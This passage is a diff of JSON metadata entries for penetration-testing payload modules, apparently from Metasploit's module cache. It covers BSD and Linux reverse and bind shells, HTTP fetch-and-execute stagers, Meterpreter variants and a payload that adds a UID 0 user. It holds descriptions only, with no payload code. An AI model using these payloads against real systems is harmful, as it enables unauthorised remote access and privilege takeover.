Shell, Find Tag Inline", - "fullname": "payload/bsd/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_reverse_tcp_ipv6": { - "name": "BSD Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/bsd/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell/bind_tcp": { - "name": "BSDi Command Shell, Bind TCP Stager", - "fullname": "payload/bsdi/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsdi/x86/shell", - "stager_refname": "bsdi/x86/bind_tcp" - }, - "payload_bsdi/x86/shell/reverse_tcp": { - "name": "BSDi Command Shell, Reverse TCP Stager", - "fullname": "payload/bsdi/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsdi/x86/shell", - "stager_refname": "bsdi/x86/reverse_tcp" - }, - "payload_bsdi/x86/shell_bind_tcp": { - "name": "BSDi Command Shell, Bind TCP Inline", - "fullname": "payload/bsdi/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell_find_port": { - "name": "BSDi Command Shell, Find Port Inline", - "fullname": "payload/bsdi/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsdi/x86/shell_reverse_tcp": { - "name": "BSDi Command Shell, Reverse TCP Inline", - "fullname": "payload/bsdi/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "optyx " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSDi", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsdi/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/aarch64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/aarch64/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/http/aarch64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/armbe/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armbe/shell_bind_tcp": { - "name": "HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/adduser": { - "name": "HTTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/http/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/http/armle/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/http/armle/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/armle/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/shell/bind_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/http/armle/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/http/armle/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/armle/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 